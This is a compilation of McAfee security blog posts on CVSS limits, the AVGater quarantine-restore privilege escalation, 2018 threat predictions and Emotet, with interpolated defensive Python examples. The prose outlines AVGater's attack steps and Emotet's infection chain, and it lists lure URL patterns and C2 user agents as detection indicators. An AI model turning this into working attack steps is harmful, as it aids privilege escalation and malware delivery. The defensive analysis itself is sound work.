Calculating CVSS helps practitioners identify those items that warrant deeper analysis. Unfortunately, due to the way that a CVSS base score is averaged across the exploitability and the impact dimensions, CVSS in some instances fails to sufficiently assess risk, especially in cases where utility to an attacker appears to be relatively insignificant.

The McAfee PSIRT uses CVSS as a critical tool for triaging vulnerabilities and for gauging response times. Still, CVSS is no substitute for a deeper risk analysis when it is warranted.

Notes

[1] We did not have access for this analysis to an OpenSSL code graph, which would have allowed a definitive examination of calls to the vulnerable code. However, it appears from a cursory examination that the module is primarily called upon user instigation, from command-line tools, not during protocol processing.

[2] There are numerous cases of scores being inflated or deflated to fit the agenda of the scorer. How can cross-site scripting scores range from 1.8 to 9? That seems impossible, but a simple search will return that range of scores from Mitre’s CVE data.

[3] Vendors may calculate alternate scores for their products, which will be dependent upon particular vendor circumstances.

[4] One published description seems to vary considerably. The following does not seem to match our reading of the code or the behavior of a single-byte heap buffer overread:

“Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.”

The post Don’t Substitute CVSS for Risk: Scoring System Inflates Importance of CVE-2017-3735 appeared first on McAfee Blogs.

Should I Worry About AVGater, Which Exploits Some Security Products?


On November 10, a researcher reported the vulnerability AVGater, which affects some antimalware products. The vulnerability allows a user without administrative privileges to restore a quarantined file to a location of the user’s choosing.

After internal reviews and with confirmation from the author of the blog, McAfee believes no McAfee products are affected by the privilege escalation vulnerability described in the AVGater blog.

The mechanism that allows users to restore files from quarantine in McAfee products is either locked by default or is available only to users with administrative privileges, providing an additional layer of protection to our customers.

AVGater, as described by blog author Florian Bogner, is based upon antimalware products’ use of a permanent storage area (folder or directory) to contain software that the antimalware program has “convicted”—executables believed to be malicious. Once convicted, the malicious software must be placed somewhere where it cannot execute and cause (further) harm.

Why not just immediately delete convicted software? If files were summarily deleted, there would always be a chance the files had been incorrectly convicted and might be important to the user. Unfortunately, no software can be considered perfect.[i] False detections occasionally occur, even with the most comprehensive and accurate software. Placing files into “quarantine,” the reserved safe area, mitigates the potential for an accidental removal of users’ important files.

Because of the potential of false-positive malware conviction, nearly every endpoint protection program makes use of a “quarantine” location, where assessed bad files are placed before deletion, just in case there has been a mistake in the identification algorithms.

Researcher Bogner has uncovered a way that quarantined software can be restored to execute, potentially with a privilege escalation from user-level privileges to the Windows system user. He has named the technique AVGater.

Privilege escalation is a critical step in the path to the full compromise of an operating system. Although a user may not have permission to write executable software into directories reserved for the operating system, if an attacker can execute malware from one of Windows’ system directories, an attacker can begin to subvert or replace critical system software with malware. Full control of the operating system may be within reach by just a few, perhaps undetected, steps.

Privilege escalation to the level of the Windows’ system user is not an attacker’s ultimate exploit, but it is a significant step that provides attackers assistance toward their goals.

We live in a world in which techniques to get users to take a single step (click, save, open, view, read) are commonplace; there are thousands of spoofs, scams, confidence games, and social engineering techniques. If you live in the digital world, you have been exposed to many of these, maybe every day.

It is not hard to imagine that attackers, having gotten their software placed into AV quarantine, can execute subsequent software, perhaps through tricking users in some manner.

AVGater is not a straightforward attack. Successful quarantine removal and copying to a system directory must be preceded by other steps for attackers to achieve their goals, whether controlling additional hosts for a botnet, gathering account information, or other ends. (See the section “AVGater technique,” below, for more information.)

Getting malware onto a Windows machine is relatively uncomplicated; it happens thousands of times every day. Tricking users to proceed is also well understood by attackers with varying levels of technical skill. Thus we believe that attacks based upon AVGater are credible, if not particularly straightforward.

AVGater has not yet been widely used by attackers. Nonetheless, it should be easy for a malware writer to drop detection defenses to force a conviction and quarantine of an attack. This step makes this attack noteworthy: Malware writers already know how to be identified by antimalware programs.

All of AVGater’s steps seem well within reasonable capabilities of competent attackers. Users whose security software is vulnerable should update to a patched version as soon as possible.

It is a poor idea to conduct day-to-day operations from the Windows administrator account. McAfee recommends that users start with a less privileged, user-level account and elevate to administrative privileges only for necessary operations and only for as long as needed to complete a task. Consumers should set up a nonadministrator account as the usual login.

McAfee® ePolicy Orchestrator® (McAfee ePO™) administrators should use the product’s capabilities to reduce the privileges that users need for common tasks, and thus reduce the privilege levels required by most users.

Always running with administrative privileges is a dangerous practice. One mistake can allow a complete compromise. Attackers do not need to go through the steps of AVGater or other privilege escalation. If attackers can execute some code as administrators, they can probably compromise Windows completely. AVGater does not lend attackers any additional advantage.

Users who recognize social engineering attacks will have an advantage in protecting themselves, because they are much less likely to accept suspicious software and fall for tricks that execute the secondary steps required in this attack.

As always, all users are advised to avoid public hotspots. If you must use one, be sure to make use of your company’s VPN services as soon as you join, or use some other VPN technology to conduct your online activities. Always disable unneeded services; do not leave file sharing on except for highly trusted networks; do not blindly accept files from untrusted sources, especially on unsecured and untrusted networks. We should always follow these safe computing practices irrespective of the latest attack technique or the state of our computing protections.

McAfee continues to investigate potential attack vectors related to AVGater. As of this writing, both McAfee and Florian Bogner have found no unmitigated paths through a McAfee product. If we discover additional information, we will update this post.

AVGater Technique

To carry out this attack, the security software must first identify an attacker-controlled program as malware, which will result in quarantine. The attacker must next switch the quarantined file for malware that will further the attack. Then the attacker must set up the necessary Windows file “junction” so that removing the file from quarantine also copies it into a directory with Windows system privileges.

Any number of tricks can convince at least some users into executing additional malicious software that removes the attack software from quarantine and, through the previously set-up file junction, places the software into a privileged directory. The attacker then must somehow execute the attack software from the joined system directory to proceed.

Attackers have developed numerous methods for avoiding or fooling attempts at conviction, while antimalware makers spend a significant proportion of their efforts identifying the attackers’ tricks so that malware will be accurately identified.

For malware writers to use this technique, they need obvious malware that will ensure conviction. Accompanying the “red herring” malware must be additional software that can hide its true intent (replace the quarantined item, set up file junction, induce the copying to system privileges, and execute the attacker’s code).

Compared with executing one or two steps against users who are running with administrative privileges, AVGater requires more steps, each of which must be executed successfully and in proper order. AVGater demands greater skill to include careful interactions between at least three steps, and at least one user-induced action. This scenario is credible, though more involved than other easy, repeatable attacks.
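On the mitigation side, the step that turns a restore into a privilege escalation is writing through a file junction. As an added illustration, not code from the post or from any McAfee product, here is a quarantine-restore routine that refuses any destination path containing a symbolic link or Windows reparse point (junctions are reparse points) and requires the normalised destination to stay inside a user-writable restore area. The function names and the directory layout built by `demo()` are assumptions for the example; the demo uses a symbolic link, which on Windows needs the symlink privilege but behaves the same as a junction for the check.

```python
import os
import shutil
import stat
import tempfile
from pathlib import Path


def has_link_component(path):
    """True if the path or any parent is a symbolic link or, on Windows, a
    reparse point such as a directory junction. lstat() is used so nothing is
    followed during the check; components that do not exist yet cannot be links."""
    p = Path(path).absolute()
    for node in (p, *p.parents):
        try:
            st = node.lstat()
        except (FileNotFoundError, NotADirectoryError):
            continue
        if stat.S_ISLNK(st.st_mode):
            return True
        reparse = getattr(stat, "FILE_ATTRIBUTE_REPARSE_POINT", 0)
        if getattr(st, "st_file_attributes", 0) & reparse:
            return True
    return False


def is_safe_restore_destination(destination, allowed_root):
    """Accept a restore target only if no link is involved anywhere in the path
    and the normalised destination stays inside the permitted restore area."""
    if has_link_component(destination):
        return False
    root = Path(allowed_root).resolve()
    try:
        Path(destination).resolve().relative_to(root)
    except ValueError:
        return False
    return True


def restore_from_quarantine(quarantined, destination, allowed_root):
    """Copy a quarantined file back only to a validated destination.
    Returns True when the file was written, False when the target was refused."""
    if not is_safe_restore_destination(destination, allowed_root):
        return False
    dest = Path(destination)
    dest.parent.mkdir(parents=True, exist_ok=True)
    shutil.copyfile(quarantined, dest)
    return True


def demo():
    """Build a constructed layout in a temp dir: a restore area, a directory
    outside it standing in for a privileged location, and a link from inside the
    area to that outside directory. Returns which checks behaved as intended."""
    base = Path(tempfile.mkdtemp()).resolve()
    allowed, outside, quarantine = base / "restore_area", base / "system_dir", base / "quarantine"
    for d in (allowed, outside, quarantine):
        d.mkdir()
    sample = quarantine / "sample.bin"
    sample.write_bytes(b"quarantined sample")          # constructed content
    os.symlink(outside, allowed / "link", target_is_directory=True)
    via_link = allowed / "link" / "payload.bin"        # path that crosses the link
    via_dotdot = allowed / ".." / "system_dir" / "payload.bin"
    plain = allowed / "docs" / "sample.bin"            # ordinary in-area target
    return {
        "link_refused": restore_from_quarantine(sample, via_link, allowed) is False,
        "dotdot_refused": restore_from_quarantine(sample, via_dotdot, allowed) is False,
        "outside_untouched": not any(outside.iterdir()),
        "plain_restored": restore_from_quarantine(sample, plain, allowed)
        and plain.read_bytes() == b"quarantined sample",
    }


if __name__ == "__main__":
    print(demo())
```

The check and the copy are two separate operations, so a production implementation should additionally open the destination with flags that refuse to follow links at write time (and run the restore in the user's own security context rather than as the service), which is the property McAfee describes above for its own products.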

[i] Software can be proven to be incorrect, but it is difficult to prove it absolutely error free. Readers may wish to investigate Alan Turing’s “Turing’s Proof,” whose math is believed to prove that an automated process cannot prove that an automated process is correct.

The post Should I Worry About AVGater, Which Exploits Some Security Products? appeared first on McAfee Blogs.

‘McAfee Labs 2018 Threats Predictions Report’ Previews Five Cybersecurity Trends


This report was written by members of McAfee Labs and the Office of the CTO.

Welcome to the McAfee Labs 2018 Threats Predictions Report. We find ourselves in a highly volatile stage of cybersecurity, with new devices, new risks, and new threats appearing every day. In this edition, we have polled thought leaders from McAfee Labs and the Office of the CTO. They offer their views on a wide range of threats, including machine learning, ransomware, serverless apps, and privacy issues.

The Adversarial Machine Learning Arms Race Revs Up
The rapid growth and damaging effects of new cyberthreats demand defenses that can detect new threats at machine speeds, increasing the emphasis on machine learning as a valuable security component. Unfortunately, machines will work for anyone, fueling an arms race in machine-supported actions from defenders and attackers. Human-machine teaming has tremendous potential to swing the advantage back to the defenders, and our job during the next few years is to make that happen. To do that, we will have to protect machine detection and correction models from disruption, while continuing to advance our defensive capabilities faster than our adversaries can ramp up their attacks.

Ransomware Pivots to New Targets, New Objectives
The profitability of traditional ransomware campaigns will decline as vendor defenses, user education, and industry strategies improve to counter them. Attackers will target less traditional, more profitable ransomware targets, including high net-worth individuals, connected devices, and businesses. This pivot from the traditional will see ransomware technologies applied beyond the objective of extorting individuals, to cyber sabotage and disruption of organizations. The drive among adversaries for greater damage, disruption, and the threat of greater financial impact will not only spawn new variations of cybercrime “business models,” but also begin to seriously drive the expansion of the cyber insurance market.

Serverless Apps: New Opportunities for Friend and Foe
Serverless apps can save time and reduce costs, but they can also increase the attack surface by introducing privilege escalation, application dependencies, and the vulnerable transfer of data across networks. Serverless apps enable greater granularity, such as faster billing for services. But they are vulnerable to attacks exploiting privilege escalation and application dependencies. They are also vulnerable to attacks on data in transit across a network. Function development and deployment processes must include the necessary security processes, and traffic that is appropriately protected by VPNs or encryption.

When Your Home Becomes the Ultimate Storefront
As connected devices fill your house, companies will have powerful incentives to observe what you are doing in your home, and probably learn more than you want to share. In 2018, McAfee predicts more examples of corporations exploring new ways to capture that data. They will consider the fines of getting caught to be the cost of doing business, and change the terms and conditions on your product or service to cover their lapses and liabilities. It is more difficult to protect yourself from these issues, and the next year will see a significant increase in breaches and discoveries of corporate malfeasance.

Inside Your Child’s Digital Backpack
Perhaps the most vulnerable in this changing world are our children. Although they face an amazing future of gadgets, services, and experiences, they also face tremendous risks to their privacy. We need to teach them how to pack their digital backpacks so that they can make the most of this future. The world is becoming very public, and though many of us seem to be OK with that, the consequences of an ill-considered post or thoughtless online activity can be life altering for years to come.

The Adversarial Machine Learning Arms Race Revs Up

Attackers and defenders work to out-innovate each other in AI

Human-machine teaming is becoming an essential part of cybersecurity, augmenting human judgment and decision making with machine speed and pattern recognition. Machine learning is already making significant contributions to security, helping to detect and correct vulnerabilities, identify suspicious behavior, and contain zero-day attacks.

During the next year, we predict an arms race. Adversaries will increase their use of machine learning to create attacks, experiment with combinations of machine learning and artificial intelligence (AI), and expand their efforts to discover and disrupt the machine learning models used by defenders. At some point during the year, we expect that researchers will reverse engineer an attack and show that it was driven by some form of machine learning. We already see black-box attacks that search for vulnerabilities and do not follow any previous model, making them difficult to detect. Attackers will increase their use of these tools, combining them in novel ways with each other and with their attack methods. Machine learning could help improve their social engineering—making phishing attacks more difficult to recognize—by harvesting and synthesizing more data than a human can. Or increase the effectiveness of using weak or stolen credentials on the growing number of connected devices. Or help attackers scan for vulnerabilities, boosting the speed of attacks and shortening the time from discovery to exploitation.

Whenever defenders come out with something new, the attackers try to learn as much about it as possible. Adversaries have been doing this for years with malware signatures and reputation systems, for example, and we expect them to do the same with the machine learning models. This will be a combination of probing from the outside to map the model, reading published research and public domain material, or trying to exploit an insider. The goal is evasion or poisoning. Once attackers think they have a reasonable recreation of a model, they will work to get past it, or to damage the model so that either their malware gets through or nothing gets through and the model is worthless.

On the defenders’ side, we will also combine machine learning, AI, and game theory to probe for vulnerabilities in both our software and the systems we protect, to plug holes before criminals can exploit them. Think of this as the next step beyond penetration testing, using the vast capacity and unique insights of machines to seek bugs and other exploitable weaknesses.

Because adversaries will attack the models, defenders will respond with layers of models—operating independently—at the endpoint, in the cloud, and in the data center. Each model has access to different inputs and is trained on different data sets, providing overlapping protections. Speaking of data, one of the biggest challenges in creating machine learning models is gathering data that is relevant and representative of the rapidly changing malware environment. We expect to see more progress in this area in the coming year, as researchers gain more experience with data sets and learn the effects of old or bad data, resulting in improved training methods and sensitivity testing.

The machines are rising. They will work with whoever feeds them data, connectivity, and electricity. Our job is to advance their capabilities faster than the attackers, and to protect our models from discovery and disruption. Working together, human-machine teaming shows great potential to swing the advantage back to the defenders.

Ransomware Pivots to New Targets, New Objectives

Swings from the traditional to new targets, technologies, tactics, and business models

McAfee sees an evolution in the nature and application of ransomware, one that we expect to continue through 2018 and beyond.

The good news about traditional ransomware. McAfee Labs saw total ransomware grow 56% over the past four quarters, but evidence from McAfee Advanced Threat Research indicates that the number of ransomware payments has declined over the last year.

Our researchers assert that the trend suggests a greater degree of success during the last 12 months by improved system backup efforts, free decryption tools, greater user and organizational awareness, and the collaborative actions of industry alliances such as NoMoreRansom.org and the Cyber Threat Alliance.

How cybercriminals are adjusting. These successes are forcing attackers to pivot to high-value ransomware targets, such as victims with the capacity to pay greater sums, and new devices lacking comparable vendor, industry, and educational action.

Targeting higher net-worth victims will continue the trend toward attacks that are more personal, using more sophisticated exploitation of social engineering techniques that deliver ransomware via spear phishing messages. These high-value targets will be attacked at their high-value endpoints, such as their increasingly expensive personal devices, including the latest generation of smart phones. Cloud backups on these devices have made them relatively free from traditional ransomware attacks. McAfee predicts that attackers will instead try to “brick” the phones, making them unusable unless a ransom payment is sent to restore them.

McAfee believes this pivot from the traditional is reflected in the slight decline in the number of overall ransomware families, as criminals shift to a smaller number of higher-value technologies and tactics, more talented purveyors of techniques, and more specialized, more capable ransomware-as-a-service providers.

New ransomware families discovered in 2017. On average, 20%‒30% per month of new samples are based on Hidden Tear ransomware code. Source: McAfee Labs.

The less sophisticated, mostly well-known, mostly predictable, one-to-many technology, tactics, and providers are simply failing to deliver the rewards to justify the investments, even modest ones.

If well-understood ransomware families survive and thrive, McAfee believes they will do so in the hands of trusted service providers that continue to establish themselves with more established, sophisticated backends, as is currently the case with the Locky family.

Where the digital impacts the physical. Every year, we read predictions about threats to our physical safety from security breaches of industrial systems in transportation, water, and power. We are also perennially entertained with creative depictions of physical threats brought about by the imminent hacking rampage of consumer devices, from the car to the coffeemaker.

McAfee resists the temptation to join the cybersecurity-vendor chorus line to warn you of the danger that lurks within your vacuum cleaner. But our researchers do foresee digital attacks impacting the physical world. Cybercriminals have an incentive to place ransomware on connected devices providing a high-value service or function to high-value individuals and organizations.

Rather than seize control of your grandmother’s automobile brakes as she drives along a winding mountain road, our researchers believe it more likely and more profitable for cybercriminals to apply ransomware to an important business executive’s car, preventing them from driving to work. We believe it more likely and more profitable for cybercriminals to place ransomware on a wealthy family’s thermostat in the dead of winter, than to set the homes of millions ablaze through their coffeemakers.

In these and other ways, we believe cybercriminals will see greater return in orchestrating digital attacks that physically impact individuals for profit, rather than fatal damage.

Beyond extortion to disruption and destruction. The WannaCry and NotPetya ransomware outbreaks foreshadow a trend of ransomware being applied in new ways, in pursuit of new objectives, becoming less about traditional ransomware extortion and more about outright system sabotage, disruption, and damage.

The WannaCry and NotPetya campaigns quickly infected large numbers of systems with ransomware, but without the payment or decryption capabilities necessary to unlock impacted systems. Although the exact objectives are still unclear, McAfee believes the attackers could have sought to blatantly disrupt or destroy huge networks of computers, or disrupt and distract IT security teams from identifying other attacks, in much the same way DDoS attacks have been used to obscure other real aspects of attacks. It is also possible that they represented spectacular proofs of concept, demonstrating their disruptive and destructive power, intending to engage large organizations with mega-extortion demands in the future.

In 2018, McAfee expects to see ransomware used in the manner of WannaCry and NotPetya. Ransomware-as-a-service providers will make such attacks available to countries, corporations, and other nonstate actors seeking to paralyze national, political, and business rivals in much the same way that NotPetya attackers knocked global IT systems out of commission at corporations around the world. We expect an increase in attacks intended to cause damage, whether by unscrupulous competitors or by criminals trying to mimic a mafia-style protection racket in cyber form.

Although this weaponization of ransomware at first seems to stretch the definition of the technology and tactical concept, consider the incentive of avoiding a WannaCry or NotPetya specific to your organization, complete with rapid, wormlike propagation and a demonstration of material disruption and damage, but with a demand for payment to make it all stop.

Of course, this raises the biggest, unavoidable ransomware question of 2017: Were WannaCry and NotPetya actually ransomware campaigns that failed in their objectives to make significant revenue? Or perhaps incredibly successful wiper campaigns?

Finally, McAfee predicts that these shifts in the nature and objectives of ransomware attacks, and their potential for real material financial impacts, will create an opportunity for insurance companies to extend their digital offerings with a range of ransomware insurance.

Serverless Apps: New Opportunities for Friend and Foe

This section was updated on December 11th.

Serverless apps attempt to match the security of a container or virtual machine

“Serverless” apps, the latest aspect of virtual computing, enable a new degree of abstraction in application development, by leveraging Functions as a Service (FaaS) for their computation requirements. Functions are billed only while they are executing, including sub-second billing (AWS Lambda charges per 100ms). Paying only for executing business logic, as opposed to running a full container or a virtual machine, can reduce costs by a factor of 10 for some operations. But what about the security of these function calls? They are vulnerable in traditional ways, such as privilege escalation and application dependencies, but also in new ways, such as traffic in transit and an increased attack surface.

Let’s start with the traditional vulnerabilities. Serverless apps that are quickly implemented or rapidly deployed can use an inappropriate privilege level, leaving the environment open to a privilege escalation attack. Achieving least privilege is more difficult with more components to protect, contain, and update. Similarly, the speed of deployment can result in a function depending on packages pulled from external repositories that are not under the organization’s control and have not been properly evaluated.

Then there are the new risks. Because serverless apps naturally scale and bill based on traffic, distributed denial of service attacks can more easily translate directly to the bottom line, depending on the number of simultaneous executions allowed by the application.

Another risk is data that may be leveraged by multiple functions to process a business transaction. Because a serverless application may include more components than prior application architectures, the data may be at more risk of interception or manipulation. Comprehensive and ubiquitous use of authentication and authorization between services and encryption of data both at rest and in transit should be leveraged.

We predict the increased granularity of serverless apps will lead to a comparable increase in the attack surface. More functions, transiting to one or more providers, means more area for an attacker to exploit or disrupt. Make sure your function development and deployment process includes the necessary security steps, and that traffic is appropriately protected by VPNs or encryption.
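As an added example, not from the report and not tied to any particular provider's tooling, here is a small audit for two of the traditional risks named above: an over-broad execution policy attached to a function, and dependencies that are not pinned. The policy documents are constructed samples in the standard IAM policy-document format (bucket name, account id and function name are placeholders), and the requirements list is a constructed pip-style file with a placeholder hash.

```python
import json
from typing import List

# Constructed sample policies in the standard IAM policy-document format.
# Bucket name, account id and function name are placeholders, not real resources.
BROAD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})

SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-bucket/uploads/*"},
        {"Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:111111111111:log-group:/aws/lambda/example-fn:*"},
    ],
})

# Constructed requirements file: one line pinned with a hash, one pinned without
# a hash, one version range, one bare package name.
SAMPLE_REQUIREMENTS = """\
# constructed sample; the hash value is a placeholder
requests==2.31.0 --hash=sha256:PLACEHOLDER
urllib3==2.0.0
pyyaml>=5.0
boto3
"""


def _as_list(value):
    """IAM allows a single string or a list for Action, Resource and Statement."""
    return value if isinstance(value, list) else [value]


def audit_policy(policy_json: str) -> List[str]:
    """Flag Allow statements whose Action or Resource is broader than one
    function needs: bare '*', service-wide 'service:*', or Resource '*'."""
    findings = []
    doc = json.loads(policy_json)
    for idx, stmt in enumerate(_as_list(doc.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*":
                findings.append(f"statement {idx}: Action '*' allows every API call")
            elif action.endswith(":*"):
                findings.append(f"statement {idx}: Action '{action}' allows a whole service")
        for resource in _as_list(stmt.get("Resource", [])):
            if resource == "*":
                findings.append(f"statement {idx}: Resource '*' applies to every resource")
    return findings


def _requirement_lines(text: str) -> List[str]:
    lines = (line.strip() for line in text.splitlines())
    return [line for line in lines if line and not line.startswith("#")]


def unpinned_requirements(text: str) -> List[str]:
    """Lines that do not pin an exact version, so a fresh deployment may pull
    whatever the external repository serves at build time."""
    return [line for line in _requirement_lines(text) if "==" not in line]


def unhashed_requirements(text: str) -> List[str]:
    """Lines that pin a version but carry no --hash, so the fetched artifact is
    not verified against a known digest."""
    return [line for line in _requirement_lines(text)
            if "==" in line and "--hash=" not in line]


if __name__ == "__main__":
    print("broad policy:", audit_policy(BROAD_POLICY))
    print("scoped policy:", audit_policy(SCOPED_POLICY))
    print("unpinned:", unpinned_requirements(SAMPLE_REQUIREMENTS))
    print("unhashed:", unhashed_requirements(SAMPLE_REQUIREMENTS))
```

Both checks are cheap enough to run as a gate in the function deployment pipeline, which is where the report suggests the security steps belong; a deploy that introduces a wildcard or an unpinned package then fails before the function is ever invoked.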

When Your Home Becomes the Ultimate Storefront

Without controls, you might surrender your privacy to corporate marketers

Corporate marketers have powerful incentives to observe and understand the buying needs and preferences of connected home device owners. Networked devices already transmit a significant amount of information without the knowledge of the overwhelming majority of consumers. Customers rarely read privacy agreements, and, knowing this, corporations are likely to be tempted to frequently change them after the devices and services are deployed to capture more information and monetize it.

In 2018, connected home device manufacturers and service providers will seek to overcome thin operating margins by gathering more of our personal data—with or without our agreement—as we practically surrender the home to become a corporate virtual store front.

With such dynamics in play, and with the technical capabilities already available to device makers, corporations could offer discounts on devices and services in return for the ability to monitor consumer behavior at the most personal level.

Rooms, devices, and apps are easily equipped with sensors and controls capable enough to inform corporate partners of the condition of home appliances, and bombard consumers with special upgrade and replacement offers.

It is already possible for children’s toys to monitor their behavior and suggest new toys and games for them, including upgrades for brand-name content subscriptions and online educational programs.

It is already possible for car manufacturers and their service centers to know the location of specific cars, and coordinate with owners calendars and personal assistants to manage and assist in the planning of their commutes. Coffee, food, and shopping stops could automatically be integrated into their schedules, based on their preferences and special offers from favorite food and beverage brands.

Whether this strikes you as a utopia for consumers and marketers, or a dystopian nightmare for privacy advocates, many aspects of these scenarios are close to reality.

Data collection from the current wide range of consumer devices and services is running far ahead of what most people believe.

Although there is certainly a legal argument that consumers have agreed to the collection of their data, even those of us knowledgeable enough to know this is taking place do not read the contracts we agree to, and some corporations might change them after the fact or go beyond what they promise.

We have seen numerous examples of corporate malfeasance in recent years. A flashlight app developer’s license agreement did not disclose that the app gathered geolocation data. Three years ago, a video game hardware company pushed an update with no option to refuse; users had to agree to new terms or stop using the product they had purchased. In many agreements, users “agree” to all future changes that the company makes unilaterally to the terms: “Continued use of the service after any such changes shall constitute your consent to such changes.”

In July, the US Federal Bureau of Investigation warned parents to be wary of connected children’s toys that could be capable of collecting their children’s personally identifiable information.

Businesses will continue to seek to understand what and how consumers consume in the privacy of their homes, certainly requiring more user data than consumers will likely be comfortable sharing. McAfee asserts that a substantial number of corporations will break privacy laws, pay fines, and still continue such practices, thinking they can do so profitably. But the FBI’s recent toy warning to parents might suggest that such approaches could result in regulatory and even criminal legal consequences.

Next year will provide new examples of how well, and how badly, corporations are able to navigate the temptations and opportunities presented by connected homes.

We thank the Electronic Frontier Foundation for their assistance with this article.

Inside Your Child’s Digital Backpack

Protecting your children from corporate abuse of their user-generated content

It seems that every product, service, or experience we interact with today creates some type of digital record, whether or not we like it. As adults, we are gradually coming to terms with this effect and learning to manage our digital lives, but what about our children? Employers are already making hiring decisions influenced by search results. Could this extend to schools, health care, and governments? Will children be denied entry to a school because of how much time they spent binge-watching videos, or find it difficult to run for office because of a video made when they were seven?

Online information, or digital baggage, can be positive, negative, or neutral. As our children go on their increasingly digital journey through life, what are they packing for their trip? Likely, it will be a combination of mostly innocuous and trivial things, some positive and amazing ones that will help them on their journey, and some negative items that could weigh them down. Unfortunately, we predict that many future adults will suffer from negative digital baggage, even if it comes about without their intention.

As parents, our challenge is to help our children navigate this new world, in which they can be tracked almost from the moment of conception. Remember that story from 2012 about a girl who received coupons from a retailer for pregnancy-related items before she acknowledged that she was pregnant?

To help our children, we need to understand the kinds of digital artifacts that are being captured and stored. There are generally three types: explicit, implicit, and inadvertent.

Explicit content is all of those things that happen after you click the “I Agree” button on the terms and conditions or end user license agreement. Given recent breaches, it seems that anything stored online will at some point be hacked, so why not assume that from the beginning? If they really want to, a prospective employer may be able to find out what content you created, your social habits, and a host of other data points. This is an area that parents (at least initially) have a lot of control and influence over, and can teach and model good habits. Are you buying “M”-rated games for your 10-year-old, or letting your teens post videos without some oversight? Sadly, what happens online is not private, and there could eventually be consequences.

Implicit content is anything you do or say in an otherwise public place, which could be photographed, recorded, or somehow documented. This ranges from acting silly to drinking or taking drugs, but also includes what people say, post, tweet, etc. in public or online. We do not think that childlike behavior (by children) is going to be frequently or successfully used against people in the future, so we can still let our kids be kids.

Inadvertent content is the danger area. These are items that were intended to remain private, or were never expected to be captured. Unfortunately, inadvertent content is becoming increasingly common, as organizations of all types (accidentally or on purpose) bend and break their own privacy agreements in a quest to capture more about us. Whether with a toy, a tablet, a TV, a home speaker, or some other device, someone is capturing your child’s words and actions and sending them to the cloud. This is the most challenging part of the digital journey, and one that we must manage vigilantly. Pay attention to what you buy and install, turn off unnecessary features, and change the default passwords to something much stronger!

Our children face an amazing potential future, full of wonderful gadgets, supportive services, and amazing experiences. Let’s teach them at home to pack their digital backpacks so that they can make the most of it.

In the corporate world, McAfee predicts that the May 2018 implementation of the European Union’s General Data Protection Regulation (GDPR) could play an important role in setting ground rules on the handling of both consumer data and user-generated content in the years to come. The new regulatory regime impacts companies that either have a business presence in EU countries, or process the personal data of EU residents, meaning that companies from around the world will be compelled to adjust the way in which they process, store, and protect customers’ personal data. Forward-looking businesses can leverage this to set best practices that benefit customers using consumer appliances, content-generating app platforms, and the online cloud-based services behind them.

In this regard, the year 2018 may well best be remembered for whether consumers truly have the right to be forgotten.

To find out more about the data protection opportunity for businesses, visit McAfee’s GDPR site.

For more on how to protect your children from potential user-generated content abuse and other digital threats, please see McAfee’s blogs for guidance on parenting in the digital age.

Contributors

  • Christiaan Beek
  • Lisa Depew
  • Magi Diego
  • Daren Dunkel
  • Celeste Fralick
  • Paula Greve
  • Lynda Grindstaff
  • Steve Grobman
  • Kenneth Howard
  • Abhishek Karnik
  • Sherin Mathews
  • Jesse Michael
  • Raj Samani
  • Mickey Shkatov
  • Dan Sommer
  • Vincent Weafer
  • Eric Wuehler
  • Jonathan King

 

About McAfee Labs

McAfee Labs is one of the world’s leading sources for threat research, threat intelligence, and cybersecurity thought leadership. With data from millions of sensors across key threats vectors—file, web, message, and network—McAfee Labs delivers real-time threat intelligence, critical analysis, and expert thinking to improve protection and reduce risks.

To learn more about our predictions for 2018, register for our January 9th webcast.

The post ‘McAfee Labs 2018 Threats Predictions Report’ Previews Five Cybersecurity Trends appeared first on McAfee Blogs.

Emotet Downloader Trojan Returns in Force

During the past couple of days, we have seen an increase in activity from Emotet. This Trojan downloader spreads by emails that lure victims into downloading a Word document, which contains macros that after executing employ PowerShell to download a malicious payload.

We have observed Emotet downloading a variety of payloads, including ransomware, Dridex, Trickbot, Pinkslipbot, and other banking Trojans.

During a wave of attacks in early December we discovered a campaign spreading the ransomware family HydraCrypt. The sample we received had a compilation date of December 5.

The initial Word documents were downloaded from a number of URLs; some examples follow:

  • hxxp://URL/DOC/Invoice/
  • hxxp://URL/scan/New-invoice-[Number]/
  • hxxp://URL/LLC/New-invoice-[Number]/

The document topics are crafted to entice users to open them because they appear to impact our finances or official documentation.

  • Invoice
  • Paypal
  • Rechnung (with or without a number)
  • Dokumente vom Notar

The documents have typical characteristics used by Emotet attackers. When a user opens the document, it claims the file is protected and asks the victim to enable the content, which launches the code hidden in the macros.

In analyzing the macros, we see heavily obfuscated code to make detection difficult and cover up the real purpose of the document:

The macro code uses a mix of command, wmic, and PowerShell to copy itself to disk, create a service, and contact its control server for a download URL.

Emotet collects information about the victim’s computer, for example running processes, and sends encrypted data to the control server using a POST request:

The specific user-agent strings used in these requests:

  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
  • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
  • Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)

The payload samples are downloaded to %Windir%\System32 using a random name, either in GUID format or a five-digit random name.
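The traits above (lure URL paths, the check-in POST with one of the listed user agents, and the drop location in System32) are enough to write a first-pass triage over proxy and file-creation telemetry. The script below is an added example and not McAfee's code: the log lines, hosts and file names are constructed, the user-agent strings are the four the post lists, and the drop-path rule is %Windir%\System32 plus a GUID-format or five-digit random name.

```python
"""Triage web-proxy and file-creation telemetry for the Emotet traits
described in this post.

Added example; not McAfee's code. Log lines, hosts and file names are
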